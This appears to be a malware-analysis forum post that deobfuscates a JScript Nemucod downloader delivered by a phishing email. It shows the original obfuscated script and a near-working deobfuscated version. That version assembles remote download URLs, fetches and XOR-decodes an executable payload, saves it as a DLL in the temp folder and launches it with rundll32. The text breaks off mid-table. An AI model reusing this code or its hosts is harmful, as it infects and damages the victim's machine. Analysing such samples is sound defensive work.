Malware Analysis New Fresh sample I received : JS/TrojanDownloader.Nemucod.ASX - 26_08_2016

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
office_equipment ~40f5dde9

Mail received (testing account for waves)

"Dear DardiM,

Please sign the attached purchase of the office equipment. We will send you back the receipt afterward.

Best regards,

Sergio Camacho

Sales Manager"

I will only talk about the script, it's not an analysis of the ransomware

I reported it to hybrid analysis, it made an analysis, here is the result :
https://www.hybrid-analysis.com/sam...391b5b044d5cb81c88a1feeb057?environmentId=100
It has seen nothing, no infection : normal I forgot to delete my comment parts and rewrite the eval function :p

The Penguin is exhausted ...:oops:

Right file submitted - right analysis done this time - Threat Score: 100/100 :
https://www.hybrid-analysis.com/sam...7a873e5597a4dc163dd23e071c1?environmentId=100

On Virus total :

14 / 55 (last edited time)
JS/TrojanDownloader.Nemucod.ASX
https://www.virustotal.com/en/file/...1be9f8a77a873e5597a4dc163dd23e071c1/analysis/

In fact, the script is very similar to :


With a big different first obfuscation method, and after, some "small" modifications.

1) Main obfuscation :

function d(){
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);
};
}
d();

var Ql = new Array("\x66"+"","\x75"+"","\x6e"+"","\x63"+"","\x74"+"","\x69"+"","\x6f"+"","\x20"+"","\x64"+"","\x28"+"","\x29"+"","\x7b"+"","\x0a"+"","\x76"+"","\x61"+"","\x72"+"","\x5f"+"","\x77"+"","\x73"+"","\x3d"+"","\x22"+"","\x57"+"","\x53"+"","\x2b"+"","\x70"+"","\x3b"+"","\x5c"+"","\x25"+"","\x79"+"","\x65"+"","\x6d"+"","\x52"+"","\x33"+"","\x32"+"","\x2e"+"","\x78"+"","\x7a"+"","\x68"+"","\x5b"+"","\x5d"+"","\x43"+"","\x4f"+"","\x62"+"","\x6a"+"","\x6c"+"","\x45"+"","\x59"+"","\x54"+"","\x4d"+"","\x31"+"","\x7d"+"","\x09"+"","\x51"+"","\x44"+"","\x49"+"","\x0d"+"","\x42"+"","\x48"+"","\x30"+"","\x46"+"","\x56"+"","\x67"+"","\x37"+"","\x4c"+"","\x50"+"","\x4a"+"","\x71"+"","\x4e"+"","\x38"+"","\x41"+"","\x5a"+"","\x47"+"","\x55"+"","\x35"+"","\x34"+"","\x36"+"","\x4b"+"","\x58"+"","\x39"+"","\x6b"+"","\x2c"+"","\x2f"+"","\x3a"+"","\x2d"+"","\x3c"+"","\x2a"+"","\x7c"+"","\x3e"+"","\x21"+"","\x5e"+"","\x26");
var Ci8 = [0/1,1/1,2/1,3/1,4/1,5/1,6/1,2/1,7/1,8/1,9/1,10/1,11/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,17/1,8/1,18/1,7/1,19/1,7/1,20/1,21/1,22/1,20/1,23/1,20/1,3/1,15/1,20/1,23/1,20/1,5/1,24/1,4/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,3/1,7/1,19/1,7/1,20/1,26/1,27/1,22/1,20/1,23/1,20/1,28/1,18/1,4/1,29/1,30/1,31/1,6/1,6/1,4/1,26/1,27/1,26/1,26/1,18/1,28/1,18/1,4/1,29/1,30/1,32/1,33/1,26/1,26/1,3/1,30/1,8/1,34/1,20/1,23/1,20/1,29/1,35/1,20/1,23/1,20/1,29/1,20/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,16/1,36/1,8/1,18/1,7/1,19/1,7/1,4/1,37/1,5/1,18/1,38/1,16/1,17/1,8/1,18/1,39/1,38/1,20/1,40/1,15/1,29/1,14/1,4/1,29/1,41/1,42/1,43/1,29/1,3/1,4/1,20/1,39/1,9/1,16/1,17/1,8/1,18/1,23/1,20/1,34/1,22/1,37/1,29/1,44/1,44/1,20/1,10/1,25/1,12/1,7/1,7/1,7/1,7/1,13/1,14/1,15/1,7/1,18/1,29/1,7/1,19/1,7/1,16/1,36/1,8/1,18/1,38/1,20/1,45/1,
...
...
/1,42/1,7/1,23/1,7/1,47/1,31/1,0/1,39/1,9/1,10/1,25/1,55/1,12/1,50/1,25];

var Hp = '';
for (var SSg=0; SSg < Ci8.length; SSg++)
{
Hp = Hp.concat(Ql[Ci8[SSg]]);
}
eval(Hp);

2) First deobfuscation :

Var QI : new Array, decoding the \xvalues => unescape unicode:
=>
("f"+"","u"+"","n"+"","c"+"","t"+"","i"+"","o"+""," "+"","d"+"","("+"",")"+"","{"+"","
"+"","v"+"","a"+"","r"+"","_"+"","w"+"","s"+"","="+"","""+"","W"+"","S"+"","+"+"","p"+"",";"+"","\"+"","%"+"","y"+"","e"+"","m"+"","R"+"","3"+"","2"+"","."+"","x"+"","z"+"","h"+"","["+"","]"+"","C"+"","O"+"","b"+"","j"+"","l"+"","E"+"","Y"+"","T"+"","M"+"","1"+"","}"+""," "+"","Q"+"","D"+"","I"+"","
"+"","B"+"","H"+"","0"+"","F"+"","V"+"","g"+"","7"+"","L"+"","P"+"","J"+"","q"+"","N"+"","8"+"","A"+"","Z"+"","G"+"","U"+"","5"+"","4"+"","6"+"","K"+"","X"+"","9"+"","k"+"",","+"","/"+"",":"+"","-"+"","<"+"","*"+"","|"+"",">"+"","!"+"","^"+"","&");​

var Ci8 :
all /number part can be removed : number divided by 1

Ci8 = [0 , 1 , 2 , 3, 4 , 5, 6, 2, 7 , 8 , 9 , 10 , 11 , 12, 7 , 7 , 7 , 7 , ...............]

for (var SSg=0; SSg < Ci8.length; SSg++)
{
Hp = Hp.concat(Ql[Ci8[SSg]]);
}

=> Ci8 : contains the index of Qi chars that may be replaced => decipher method

Hp :

Result : the code "less" obfuscated.

Example :

0 => f
1 => u
2 => n
3 => c
4 => t
5 => i
6 => o
2 => n
7 => blank char

A funny part :

The beginning of this first deobfuscation is, another time, the same code that at the beginning of the script : lol

function d(){
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
}
d();

=> so, once real part is build : 2 times this function and d() call :rolleyes:

What is the aim of this function ?
Verify that the script is used on a system with %SystemRoot%\system32\cmd.exe
available (environment property "ComSpec" is retrieved and compared)

var WshShell = WScript.CreateObject("WScript.Shell");
var WshSysEnv = WshShell.
Environment("SYSTEM");

'The WshEnvironment object is a collection of environment variables that is returned by the WshShell object's Environment property. This collection contains the entire set of environment variables (those with names and those without). To retrieve individual environment variables (and their values) from this collection, use the environment variable name as the index'.
Here : "ComSpec"

WshSysEnv("ComSpec")

=> %SystemRoot%\system32\cmd.exe"

At the end of the function, if the two strings are different, it quits.
To remove first obfuscation :

eval(Hp); => evaluate the string => for analysis, eval removed :p
=> HP will be a String with all the part​

3) After first deobfuscation :

Long part, but only need, after, some var concatenation / replacement
function d(){
var _wds = "WS"+"cr"+"ipt";
var _c = "\%S"+"ystemRoot\%\\system32\\cmd."+"ex"+"e";
var _zds = this[_wds]["CreateObject"](_wds+".Shell");
var se = _zds["E"+"n"+"vironmen"+"t"]("S"+"Y"+"S"+"TEM");
var _dd = se("ComSpe"+"c");
if (_dd == _c) {return 1;}
else {WScript.Quit(1);};
}
d();
var DIl = "ose" + "";
var TBh = "cl" + "";
var Hu = "ile" + "";
var Br0 = "oF" + "";
var Vg7 = "SaveT" + "";
var DLg = "Text" + "";
var Py = "write" + "";
var JCq = "n" + "";
var PNp = "ope" + "";
var PQe8 = "rset" + "";
var By8 = "Cha" + "";
var NTs8 = "type" + "";
var EDi = "am" + "";
var HVj3 = "re" + "";
var AHp = "St" + "";
var Md0 = "DB." + "";
var Qg = "O" + "";
var Qh = "D" + "";
var VYl = "A" + "";
var Wg3 = "ct" + "";
var ZVf1 = "eObje" + "";
var Ll = "Creat" + "";
var GPy = "join" + "";
var VUe5 = "e" + "";
var St2 = "arCod" + "";
var NEh0 = "Ch" + "";
var GPe8 = "from" + "";
var Wp = "th" + "";
var Re5 = "leng" + "";
var PIj = "sh" + "";
var Re = "pu" + "";
var Yd7 = "t" + "";
var Oz8 = "deA" + "";
var Jy = "arCo" + "";
var Ha = "ch" + "";
var CJj4 = "gth" + "";
var BWt3 = "len" + "";
var JHm = "e" + "";
var Ru = "clos" + "";
var JMd2 = "xt" + "";
var TUo = "adTe" + "";
var Vi6 = "Re" + "";
var Dx5 = "le" + "";
var Hs = "romFi" + "";
var Cv7 = "adF" + "";
var Dy6 = "Lo" + "";
var UOv = "open" + "";
var Kp = "t" + "";
var XQg1 = "se" + "";
var Lf = "Char" + "";
var APo0 = "e" + "";
var UEs = "typ" + "";
var Uo1 = "am" + "";
var IId = "tre" + "";
var Zp5 = "DB.S" + "";
var JVp2 = "O" + "";
var Dx3 = "D" + "";
var MHl3 = "A" + "";
var PFd9 = "ject" + "";
var NKk = "eOb" + "";
var QSt = "eat" + "";
var ITb = "Cr" + "";
var VIz = "th" + "";
var VOy4 = "leng" + "";
var XVu = "h" + "";
var MJt = "gt" + "";
var Kk7 = "len" + "";
var Xu7 = "ice" + "";
var JGk = "spl" + "";
var XUy3 = "h" + "";
var DOz = "lengt" + "";
var Fg5 = "gth" + "";
var NIw = "len" + "";
var QOe = "th" + "";
var Xq9 = "leng" + "";
var NMu = "th" + "";
var ZXd6 = "leng" + "";
var Sp3 = "h" + "";
var Aq7 = "gt" + "";
var Rr3 = "len" + "";
var Pz4 = "eep" + "";
var Ep = "Sl" + "";
var OCv5 = "3" + "";
var Jh = "y 32" + "";
var Uj = "ert" + "";
var Cp = ",qw" + "";
var Jw = " " + "";
var Ao = "Run" + "";
var Yo2 = "th" + "";
var Gs9 = "leng" + "";
var Uy = "h" + "";
var Il = "lengt" + "";
var TRf = "e" + "";
var Ab = "clos" + "";
var Gh5 = "File" + "";
var Cz = "eTo" + "";
var KIy6 = "Sav" + "";
var LMj = "n" + "";
var WXl8 = "sitio" + "";
var Yq = "po" + "";
var Wz = "y" + "";
var Td7 = "Bod" + "";
var Si = "onse" + "";
var NVt = "Resp" + "";
var PYg = "write" + "";
var WKs3 = "type" + "";
var CLc0 = "en" + "";
var Ya0 = "op" + "";
var Sq1 = "m" + "";
var Da7 = "trea" + "";
var YSd7 = "DB.S" + "";
var NIo1 = "O" + "";
var Gv7 = "D" + "";
var Ma7 = "A" + "";
var Pv3 = "ct" + "";
var Of2 = "eObje" + "";
var Md = "Creat" + "";
var Co = "p" + "";
var BBw = "ee" + "";
var Qw = "Sl" + "";
var ZKp = "send" + "";
var WZg = "th" + "";
var LVk = "ng" + "";
var Nr = "le" + "";
var Oc6 = "GET" + "";
var Wb = "open" + "";
var XHm = "gth" + "";
var EYq = "len" + "";
var He = "Quit" + "";
var Go7 = "ript" + "";
var Dx = "WSc" + "";
var Bb5 = "ts" + "";
var Zg = "xis" + "";
var VQd = "FileE" + "";
var Ka9 = ".txt" + "";
var FXl8 = "s" + "";
var Vn = "ist" + "";
var Va = "Ex" + "";
var Js = "File" + "";
var VGj1 = "t" + "";
var Yy5 = "jec" + "";
var GIy0 = "emOb" + "";
var Hk7 = "st" + "";
var AHq = "leSy" + "";
var Lx2 = ".Fi" + "";
var Ny6 = "ing" + "";
var ZHe = "pt" + "";
var Fj0 = "Scri" + "";
var Cg7 = "ct" + "";
var Ae = "je" + "";
var ZSf8 = "teOb" + "";
var Op0 = "Crea" + "";
var Tl5 = "h" + "";
var HXh4 = "lengt" + "";
var Kk2 = ".1" + "";
var GXj = "est.5" + "";
var Ey7 = "equ" + "";
var CMz6 = "HttpR" + "";
var PWd = "in" + "";
var Ww0 = "tp.W" + "";
var Bx5 = "WinHt" + "";
var Cl1 = "TTP" + "";
var QZf7 = "XMLH" + "";
var KKr2 = "ML2." + "";
var NAp9 = "MSX" + "";
var ABx = "/" + "";
var DQo = "9+" + "";
var BFi = "45678" + "";
var HNn0 = "0123" + "";
var Yu0 = "wxyz" + "";
var FHs = "stuv" + "";
var Gf = "pqr" + "";
var Fi = "no" + "";
var OQa = "klm" + "";
var Ps = "fghij" + "";
var UWj = "bcde" + "";
var AKs8 = "WXYZa" + "";
var YHq9 = "RSTUV" + "";
var IVg3 = "OPQ" + "";
var EDd = "KLMN" + "";
var UXu0 = "GHIJ" + "";
var Dv5 = "CDEF" + "";
var Gd1 = "AB" + "";
var Mi0 = "%SystemRoot%\\\\system32\\\\rundll32.exe" + "";
var NLq = "%SystemRoot%\\\\SysWOW64\\\\rundll32.exe" + "";
var XGx = "amd64" + "";
var HSu1 = "TURE" + "";
var DEa = "ITEC" + "";
var JBs8 = "CH" + "";
var Ht0 = "_AR" + "";
var HYu2 = "OR" + "";
var Ex1 = "SS" + "";
var SIq = "PROCE" + "";
var ZPt = "m" + "";
var Bp2 = "te" + "";
var Ds = "Sys" + "";
var GIf = "ll" + "";
var Fb = ".d" + "";
var Es0 = "Ggw" + "";
var ZLu = "gsGc" + "";
var IZr = "ooSns" + "";
var Fq = "P%/" + "";
var Nj = "%TEM" + "";
var KTx = "l" + "";
var Pi2 = "Shel" + "";
var BZr = "ript." + "";
var GBg = "WSc" + "";
var GNu0 = "ect" + "";
var Jz = "teObj" + "";
var Cd = "Crea" + "";
var BCt = "2ictp" + "";
var Vx = "g/" + "";
var Gj = ".wan" + "";
var Ai0 = "y7" + "";
var ZVf0 = "ad" + "";
var XIa = "l" + "";
var Tp5 = "rano" + "";
var Qq = "sop" + "";
var LOi = "//" + "";
var TTu = "http:" + "";
var NAj = "pe" + "";
var Tp7 = "fhs" + "";
var GPw = "sl" + "";
var BUu7 = "t/" + "";
var Of3 = "ne" + "";
var Nc = "o." + "";
var Tf9 = "i" + "";
var Ea4 = "br" + "";
var ZDn = "li" + "";
var YDg7 = "ui" + "";
var Os = "eq" + "";
var Oz0 = "ado" + "";
var Ag = "ci" + "";
var Ei3 = "ssen" + "";
var Tn = "e" + "";
var QXr = "//" + "";
var XBm = "tp:" + "";
var Ah = "ht" + "";
var IYq0 = "1s5" + "";
var Hl = "ut" + "";
var Af1 = "eu/" + "";
var So = "at." + "";
var Sq6 = "im" + "";
var AYc8 = "e" + "";
var YOv7 = ".h" + "";
var LLy5 = "e" + "";
var Br2 = "rag" + "";
var Cn = "-of-" + "";
var MQh7 = "lm" + "";
var SJa = "ea" + "";
var Ai2 = "p://r" + "";
var Vu0 = "htt" + "";
var JPy = "yg2" + "";
var Ke = "40" + "";
var Wk = "/g" + "";
var Vq = "om" + "";
var Za2 = ".c" + "";
var Kb3 = "e" + "";
var LTh = "ttl" + "";
var MEw1 = "o" + "";
var YXv5 = "xb" + "";
var Ch = "ati" + "";
var DSx = "qu" + "";
var QSu = "://a" + "";
var Dk7 = "p" + "";
var Tj4 = "htt" + "";
var EBb = "cb" + "";
var ULs4 = "v07t7" + "";
var OHi6 = ".68/" + "";
var Hk = "29" + "";
var Ka6 = ".1" + "";
var KFg2 = "26" + "";
var Jj = "2." + "";
var Yq8 = "://21" + "";
var CHu1 = "tp" + "";
var Yc = "ht" + "";
var Ai = "437" + "";
var SQk2 = "ngth" + "";
var TAh2 = "le" + "";
var QGx4 = "m" + "";
var WMm = "mmmm" + "";
var Ji = "mmmmm" + "";
var IOf = "mmm" + "";
var WMf = "mm" + "";
var KKc5 = "mmmm" + "";
var Wd8 = "mmmmm" + "";
var DZa = "mmmm" + "";
var Ap8 = "fd" + "";
var Yu = "sdfas" + "";
var FEo3 = "asfa" + "";
var HAj = "th" + "";
var Zc = "leng" + "";
var HJs = "m" + "";
var YRz = "mm" + "";
var Vo3 = "mmmm" + "";
var HEk4 = "mmmm" + "";
var Pm2 = "mmmmm" + "";
var OXa = "mmmm" + "";
var PAj0 = "mm" + "";
var Sq = "mm" + "";
var Wh8 = "mmm" + "";
var AGf5 = "mmm" + "";
var ZIv = "mmmmm" + "";
var Ht4 = "mmmmm" + "";
var Pe = "mmmm" + "";
var FLt = "mmmmm" + "";
var JFt3 = "mmmmm" + "";
var NRs4 = "mm" + "";
var Fp = "h" + "";
var ETi8 = "lengt" + "";
var Pp9 = "mmm" + "";
var FOt = "mmm" + "";
var RCp2 = "mmmm" + "";
var Un = "mmmmm" + "";
var LKr = "mmmmm" + "";
var JFa2 = "mmmmm" + "";
var Bl8 = "mm" + "";
var Dd2 = "mmmmm" + "";
var NPu2 = "mmmm" + "";
var Is1 = "mm" + "";
var NNc0 = "132" + "";
var Kx0 = "1123" + "";
var Hw = (Kx0 + NNc0, Is1 + NPu2 + Dd2 + Bl8 + JFa2 + LKr + Un + RCp2 + FOt + Pp9);
var Uv = Hw[ETi8 + Fp];
var WBe = (NRs4 + JFt3 + FLt + Pe + Ht4 + ZIv + AGf5 + Wh8 + Sq + PAj0 + OXa + Pm2 + HEk4 + Vo3 + YRz + HJs);
var IVi2 = 753887;
var Uw = WBe[ETi8 + Fp];
var MOk3 = (FEo3 + Yu + Ap8, DZa + Wd8 + KKc5 + WMf + IOf + Ji + WMm + QGx4);
var Ma6 = MOk3[ETi8 + Fp];

var Yz = 2871 - 2870;
var AJf = 2;
var IDz0 = 2;
var Hn = "437";

var IGv7 = [Yc + CHu1 + Yq8 + Jj + KFg2 + Ka6 + Hk + OHi6 + ULs4 + EBb, Tj4 + Dk7 + QSu + DSx + Ch + YXv5 + MEw1 + LTh + Kb3 + Za2 + Vq + Wk + Ke + JPy, Vu0 + Ai2 + SJa + MQh7 + Cn + Br2 + LLy5 + YOv7 + AYc8 + Sq6 + So + Af1 + Hl + IYq0, Ah + XBm + QXr + Tn + Ei3 + Ag + Oz0 + Os + YDg7 + ZDn + Ea4 + Tf9 + Nc + Of3 + BUu7 + GPw + Tp7 + NAj, Ah + XBm + LOi + Qq + Tp5 + XIa + ZVf0 + Ai0 + Gj + Vx + BCt];
var Xl3 = WScript[Cd + Jz + GNu0](GBg + BZr + Pi2 + KTx);
var XWe = Xl3.ExpandEnvironmentStrings(Nj + Fq);
var NQf6 = XWe + IZr + ZLu + Es0;
var Nt5 = NQf6 + Fb + GIf;

var Vu = Xl3.Environment(Ds + Bp2 + ZPt);
if (Vu(SIq + Ex1 + HYu2 + Ht0 + JBs8 + DEa + HSu1).toLowerCase() == "amd64") {
var UFn4 = Xl3.ExpandEnvironmentStrings(NLq);
} else {
var UFn4 = Xl3.ExpandEnvironmentStrings(Mi0);
}

function uheprng(Ww) {
return (function() {
var seed = Ww;
var o = 48,
c = 1,
p = o,
s = new Array(o);
var i, j;
var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var mash = Mash();
for (i = 0; i < o; i++) s = mash(seed);
mash = null;
var random = function(range) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}

function rawprng() {
if (++p >= o) p = 1 * 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}
return random;
}());
};

function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if (data) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h >>> 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}

var SPz0 = [NAp9 + KKr2 + QZf7 + Cl1, Bx5 + Ww0 + PWd + CMz6 + Ey7 + GXj + Kk2];

for (var Lp9 = 0; Lp9 < SPz0[ETi8 + Fp]; Lp9++) {
try {
var MBi0 = WScript[Cd + Jz + GNu0](SPz0[Lp9]);
break;
} catch (e) {
continue;
}
};

var OPr3 = "";
var fso = new ActiveXObject(Fj0 + ZHe + Ny6 + Lx2 + AHq + Hk7 + GIy0 + Yy5 + VGj1);

var MTm6 = uheprng(Math.random().toString());
var ENa6 = 1;
do {
if (fso[Js + Va + Vn + FXl8](Nt5)) {
var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;
OPr3 = DAb4 + Ka9;
if (fso[Js + Va + Vn + FXl8](OPr3)) {
this[Dx + Go7][He](824 - 824);
}
}

var HFw3 = MTm6(IGv7[ETi8 + Fp]);

try {
if (1 == ENa6) {
MBi0[Wb](Oc6, IGv7[HFw3++ % IGv7[ETi8 + Fp]], false);
MBi0[ZKp]();
}

if (MBi0.readystate < 4) {
WScript[Qw + BBw + Co](100);
continue;
}

var Nf = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
Nf[Wb]();
Nf[WKs3] = Yz;
Nf[PYg](MBi0[NVt + Si + Td7 + Wz]);
Nf[Yq + WXl8 + LMj] = 0;
Nf[KIy6 + Cz + Gh5](NQf6, IDz0);
Nf[Ab + TRf]();

var CJf2 = OMb(NQf6);
CJf2 = HIi(CJf2);
if (CJf2[ETi8 + Fp] < 100 * 1024 || CJf2[ETi8 + Fp] > 230 * 1024 || !XHw6(CJf2)) {
ENa6 = 1;
continue;
}
try {
IGi2(Nt5, CJf2);
} catch (e) {
break;
};

var Em = fso.GetFile(Nt5);
var DAb4 = Em.ShortPath;

Xl3[Ao](UFn4 + Jw + DAb4 + Cp + Uj + Jh + OCv5);
WScript.Sleep(3000);
} catch (e) {
WScript[Qw + BBw + Co](1000);
continue;
};
} while (ENa6);

WScript.Quit(0);

function HIi(JEc3) {
var TIk;

var ELs = uheprng(
REMOVED_TO_PROTECT_YOU);
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
JEc3[Lp9] ^= ELs(256);
}

var Zm6 = JEc3[JEc3[ETi8 + Fp] - 4] | JEc3[JEc3[ETi8 + Fp] - 3] << 8 | JEc3[JEc3[ETi8 + Fp] - 2] << 16 | JEc3[JEc3[ETi8 + Fp] - 1] << 24;
JEc3[JGk + Xu7](CJf2[ETi8 + Fp] - 4, 4);

TIk = Uv;
for (var Lp9 = 0; Lp9 < JEc3[ETi8 + Fp]; Lp9++) {
TIk = (TIk + JEc3[Lp9]) % 0x100000000;
};
if (TIk != Zm6) {
return [];
};

return JEc3;
};


function XHw6(JEc3) {
if (JEc3[0] == 0x4D && JEc3[1] == 0x5a) {

return true;
} else {
return false;
}
};


function OMb(Nq) {

var QAl8 = WScript[Cd + Jz + GNu0](Ma7 + Gv7 + NIo1 + YSd7 + Da7 + Sq1);
QAl8[WKs3] = AJf;
QAl8[Lf + XQg1 + Kp] = Hn;
QAl8[Wb]();
QAl8[Dy6 + Cv7 + Hs + Dx5](Nq);
var Fm = QAl8[Vi6 + TUo + JMd2];
QAl8[Ab + TRf]();
return St(Fm);
};


function St(IBx3) {

var Vi5 = new Array();

Vi5[199] = 50 * 2 + 28;
Vi5[252] = 129;
Vi5[233] = 130;
Vi5[226] = 9737 - 9606;
Vi5[228] = 132;
Vi5[224] = 133;
Vi5[229] = 134;
Vi5[231] = 135;
Vi5[33 * 7 + 3] = 136;
Vi5[6873 - 6638] = 9263 - 9126;
Vi5[232] = -1483 + 1621;
Vi5[239] = 4882 - 4743;
Vi5[238] = 7993 - 7853;
Vi5[236] = 141;
Vi5[196] = 142;
Vi5[197] = -261 + 404;
Vi5[201] = 144;
Vi5[230] = 145;
Vi5[198] = 6355 - 6209;
Vi5[-6198 + 6442] = 147;
Vi5[-4163 + 4409] = 148;
Vi5[242] = 149;
Vi5[251] = 150;
Vi5[249] = 151;
Vi5[255] = 152;
Vi5[7046 - 6832] = 153;
Vi5[5708 - 5488] = 154;
Vi5[162] = 155;
Vi5[163] = 156;
Vi5[165] = 32 * 4 + 29;
Vi5[8359] = 158;
Vi5[402] = 159;
Vi5[225] = 160;
Vi5[6218 - 5981] = 161;
Vi5[243] = -7644 + 7806;
Vi5[250] = 163;
Vi5[5038 - 4797] = 164;
Vi5[209] = 165;
Vi5[170] = 166;
Vi5[186] = 167;
Vi5[191] = 168;
Vi5[8976] = 1933 - 1764;
Vi5[172] = 170;
Vi5[189] = -1595 + 1766;
Vi5[188] = 58 * 2 + 56;
Vi5[9861 - 9700] = 173;
Vi5[171] = 174;
Vi5[9639 - 9452] = 175;
Vi5[1057 * 9 + 104] = 37 * 4 + 28;
Vi5[9618] = -2836 + 3013;
Vi5[9619] = 178;
Vi5[9474] = 179;
Vi5[9508] = 180;
Vi5[9569] = 181;
Vi5[17395 - 7825] = 182;
Vi5[9558] = 183;
Vi5[9557] = 3196 - 3012;
Vi5[1279 + 8292] = 185;
Vi5[9553] = 186;
Vi5[9559] = 71 * 2 + 45;
Vi5[9565] = 188;
Vi5[3243 * 2 + 3078] = 189;
Vi5[9563] = 190;
Vi5[9488] = 191;
Vi5[9492] = 192;
Vi5[9524] = 193;
Vi5[9516] = 194;
Vi5[9500] = 195;
Vi5[9472] = 196;
Vi5[17570 - 8038] = 5 * 39 + 2;
Vi5[9566] = 198;
Vi5[9567] = 199;
Vi5[9562] = 200;
Vi5[9556] = 201;
Vi5[9577] = 202;
Vi5[9574] = 203;
Vi5[9568] = 204;
Vi5[9552] = 205;
Vi5[9580] = 206;
Vi5[9575] = 207;
Vi5[9576] = 208;
Vi5[2030 * 4 + 1452] = -2543 + 2752;
Vi5[9573] = 210;
Vi5[9561] = 211;
Vi5[9560] = 212;
Vi5[9554] = -7618 + 7831;
Vi5[9555] = 214;
Vi5[9579] = 215;
Vi5[9578] = 216;
Vi5[9496] = -2183 + 2400;
Vi5[9484] = 218;
Vi5[7422 + 2186] = 219;
Vi5[9604] = 220;
Vi5[2068 * 4 + 1340] = 10158 - 9937;
Vi5[9616] = 222;
Vi5[9600] = 223;
Vi5[945] = 224;
Vi5[69 * 3 + 16] = 225;
Vi5[5015 - 4100] = 226;
Vi5[960] = 227;
Vi5[-6443 + 7374] = 228;
Vi5[963] = 229;
Vi5[5321 - 5140] = 230;
Vi5[964] = 908 - 677;
Vi5[-7390 + 8324] = 232;
Vi5[920] = 233;
Vi5[5628 - 4691] = 234;
Vi5[7495 - 6547] = 104 * 2 + 27;
Vi5[9421 - 687] = 78 * 3 + 2;
Vi5[966] = 237;
Vi5[949] = 10003 - 9765;
Vi5[8745] = 239;
Vi5[4107 + 4694] = 240;
Vi5[-8510 + 8687] = 5178 - 4937;
Vi5[629 * 13 + 628] = 242;
Vi5[8804] = 243;
Vi5[8992] = 6450 - 6206;
Vi5[8993] = -7303 + 7548;
Vi5[247] = 246;
Vi5[8776] = 247;
Vi5[176] = 248;
Vi5[8729] = 249;
Vi5[183] = 250;
Vi5[8730] = 251;
Vi5[8319] = 252;
Vi5[178] = 253;
Vi5[9632] = 254;
Vi5[160] = 255;

var CJf2 = new Array();
for (var Lp9 = 0; Lp9 < IBx3[ETi8 + Fp]; Lp9++) {
var El = IBx3[Ha + Jy + Oz8 + Yd7](Lp9);
if (El < 128) {
var Lj4 = El;
} else {
var Lj4 = Vi5[El];
}
CJf2[Re + PIj](Lj4);
};

return CJf2;
};


function Kx1(JEc3) {

var Io = new Array();

Io[128] = 15 * 13 + 4;
Io[129] = 252;
Io[-2277 + 2407] = 233;
Io[131] = 226;
Io[-1834 + 1966] = 228;
Io[133] = 224;
Io[1769 - 1635] = 229;
Io[135] = 231;
Io[136] = 234;
Io[137] = 78 * 3 + 1;
Io[138] = 232;
Io[139] = 239;
Io[140] = 238;
Io[141] = 236;
Io[142] = 196;
Io[143] = 197;
Io[144] = 201;
Io[145] = 230;
Io[146] = 198;
Io[46 * 3 + 9] = 244;
Io[148] = 246;
Io[149] = 242;
Io[117 + 33] = 4170 - 3919;
Io[-1899 + 2050] = 249;
Io[152] = 255;
Io[153] = 93 * 2 + 28;
Io[-5752 + 5906] = 10 * 22;
Io[61 * 2 + 33] = 5897 - 5735;
Io[156] = 1376 - 1213;
Io[157] = 165;
Io[158] = 8359;
Io[1784 - 1625] = 65 * 6 + 12;
Io[160] = 225;
Io[161] = 84 * 2 + 69;
Io[162] = 243;
Io[24 * 6 + 19] = 250;
Io[164] = 5946 - 5705;
Io[165] = 13 * 16 + 1;
Io[166] = 170;
Io[167] = 186;
Io[168] = 191;
Io[169] = 8976;
Io[170] = 172;
Io[171] = 189;
Io[172] = 188;
Io[173] = 161;
Io[174] = 171;
Io[175] = 51 * 3 + 34;
Io[8426 - 8250] = 9617;
Io[177] = 9618;
Io[178] = 11785 - 2166;
Io[179] = 3796 * 2 + 1882;
Io[-6284 + 6464] = 13737 - 4229;
Io[181] = 9569;
Io[-8301 + 8483] = 9570;
Io[183] = 6199 + 3359;
Io[184] = 9557;
Io[185] = 9571;
Io[186] = 9553;
Io[187] = 9559;
Io[18 * 10 + 8] = 9565;
Io[43 * 4 + 17] = 9564;
Io[21 * 9 + 1] = 2506 * 3 + 2045;
Io[-4034 + 4225] = 15634 - 6146;
Io[192] = 2698 * 3 + 1398;
Io[-5681 + 5874] = 9524;
Io[194] = 9516;
Io[2693 - 2498] = 9500;
Io[196] = 9472;
Io[15 * 13 + 2] = 9532;
Io[198] = 9566;
Io[199] = 9567;
Io[95 * 2 + 10] = 9562;
Io[201] = 9556;
Io[202] = 9577;
Io[1126 - 923] = 9574;
Io[69 * 2 + 66] = 9568;
Io[205] = 508 * 18 + 408;
Io[206] = 9580;
Io[-6813 + 7020] = 9575;
Io[10080 - 9872] = 9576;
Io[209] = 9572;
Io[210] = 2671 + 6902;
Io[211] = 8842 + 719;
Io[212] = 9487 + 73;
